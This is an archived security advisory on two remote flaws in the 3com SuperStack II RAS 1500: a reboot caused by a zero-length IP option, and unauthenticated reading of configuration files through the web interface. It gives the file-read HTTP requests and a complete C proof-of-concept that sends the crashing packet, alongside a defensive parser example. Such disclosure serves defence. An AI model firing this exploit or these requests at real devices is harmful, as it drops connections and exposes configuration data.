24th Mar 2003 [SBWID-6089]
COMMAND
	3com Remote vulnerabilities
SYSTEMS AFFECTED
	3com RAS 1500, Product: 3C433279A-US Firmware X2.0.10
PROBLEM
	In Piotr Chytla's [[email protected]] advisory:
	
	 http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
	
	3com SuperStack II Remote Access System 1500 is a telco device which
	provides access via BRI-ISDN/Analog to dialin users. It contains two
	remote vulnerabilities: the first is a Denial of Service that leads to a
	system crash, the second can be used to read configuration files.
	Details:
	--------
	1. Remote Denial of Service
	It is possible to remotely reboot the RAS 1500 (Router unit) system by
	sending a malformed packet with the IP option len field set to zero. This
	bug can cause the loss of all switched connections on the PRI-ISDN
	interface.
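	A defender-side check for the packet shape described above, added here as
	an example and not part of the iSEC advisory: a bounds-checked IPv4
	options walker that rejects an option whose length byte is 0 (or 1)
	instead of looping on it or walking past the header. The header bytes
	below are constructed for illustration.

```c
/* Bounds-checked IPv4 options walker (example written for this page, not
 * taken from the advisory). A naive parser does "off += len" and, for a
 * zero-length option, never advances: that is the failure mode behind the
 * RAS 1500 reboot described in the advisory. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum { OPT_BAD_IHL = -1, OPT_ZERO_LEN = -2, OPT_TRUNCATED = -3 };

/* Walk the options area of an IPv4 header in pkt[0..pkt_len).
 * Returns the number of options found (>= 0) or a negative error code. */
int walk_ip_options(const uint8_t *pkt, size_t pkt_len)
{
    if (pkt_len < 20) return OPT_BAD_IHL;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;      /* header length in bytes */
    if (ihl < 20 || ihl > pkt_len) return OPT_BAD_IHL;
    size_t off = 20;
    int count = 0;
    while (off < ihl) {
        uint8_t type = pkt[off];
        if (type == 0) break;                        /* EOL: end of options */
        if (type == 1) { off++; count++; continue; } /* NOP: single byte */
        if (off + 1 >= ihl) return OPT_TRUNCATED;    /* no room for len byte */
        uint8_t len = pkt[off + 1];
        /* len includes type and length bytes, so anything below 2 can never
         * advance the cursor; reject it instead of spinning or overreading. */
        if (len < 2) return OPT_ZERO_LEN;
        if (off + len > ihl) return OPT_TRUNCATED;   /* option overruns IHL */
        off += len;
        count++;
    }
    return count;
}

/* Constructed 24-byte header (IHL=6): 20 fixed bytes, then an option with
 * type 0xe4 and length 0, the shape the advisory describes. */
static const uint8_t bad_hdr[24] = {
    0x46, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x40, 0x11, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02, 0xe4, 0x00, 0x00, 0x00 };
/* Constructed well-formed header: NOP followed by a 3-byte option. */
static const uint8_t good_hdr[24] = {
    0x46, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x40, 0x11, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02, 0x01, 0x07, 0x03, 0x04 };

int main(void)
{
    printf("bad_hdr  -> %d\n", walk_ip_options(bad_hdr, sizeof bad_hdr));   /* -2 */
    printf("good_hdr -> %d\n", walk_ip_options(good_hdr, sizeof good_hdr)); /* 2 */
    return 0;
}
```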
	2. Configuration file read
	An unauthorized user can read configuration and system files using the
	web interface on the RAS 1500.
	
	    GET /download.htm HTTP/1.0
	    HTTP/1.0 401 Unauthorized
	    WWW-Authenticate: Basic realm="RAS1500"
	    Content-Type: text/html
	    Server: Allegro-Software-RomPager/2.10
	
	    GET /user_settings.cfg HTTP/1.0
	    HTTP/1.0 200 OK
	    Content-Type: multipart
	    Date: Mon, 25 May 1998 00:26:38 GMT
	    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
	    Content-Length: 1258
	    Server: Allegro-Software-RomPager/2.10
	    [..]
	
	    content of user_setting.cfg
	RAS 1500 requires HTTP basic authorization only for the download.htm file,
	which is the download manager for configuration files and system software.
	Unfortunately, the system images and configuration files themselves are
	not protected by HTTP authorization.
	Exploit:
	--------
	Below is attached a working proof-of-concept exploit for vulnerability
	no. 1.
	
	------X<------isec-options.c------X<------
	/* 
	 * 3com superstack II RAS 1500 remote Denial of Service
	 *
	 * Piotr Chytla <[email protected]>
	 *
	 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
	 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
	 *
	 * (c) 2003 Copyright by iSEC Security Research
	 */
	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <libnet.h>
	#define OPT_LEN 4
	void usage()
	{
	  printf("Args: \n");
	  printf("-s [source address]\n");
	  printf("-d [destination address]\n");
	}
	int main(int argc,char *argv[]) 
	{
	 char a;
	 int sock,r;
	 u_long src;
	 u_long dst;
	 char pktbuf[IP_MAXPACKET];
	 char payload[]="ABCDEFGHIJKLMNOPRST";
	 u_char options[4];
	 struct ipoption ipopt;
	 bzero(options,OPT_LEN);
	 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
	 {
	     switch(a) {
	         case 'h' : { usage(); exit(1); }
	         case 's' : { src=libnet_name_resolve(optarg,0); break;}
	         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
	        }
	 }
	 sock = libnet_open_raw_sock(IPPROTO_RAW);
	 if (sock<0)
	 {
	 perror("socket");
	 exit(1);
	 }
	 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
	  memcpy(ipopt.ipopt_list, options, OPT_LEN);
	  *(ipopt.ipopt_list)     = 0xe4;
	  *(ipopt.ipopt_list+1)   = 0;
	  *(ipopt.ipopt_list+2)   = 0;
	  *(ipopt.ipopt_list+3)   = 0;
	  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
	  if (r <0)
	   {
	        libnet_close_raw_sock(sock); 
	        printf("Error ip options insertion failed\n");
	        exit(1);
	   }
	  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
	  if (r<0)
	  {
	   libnet_close_raw_sock(sock);
	   printf("Error write_ip \n");
	   exit(1);
	  }  
	 libnet_close_raw_sock(sock);
	 return 0;
	}
	------X<------isec-options.c------X<------
	
SOLUTION
	?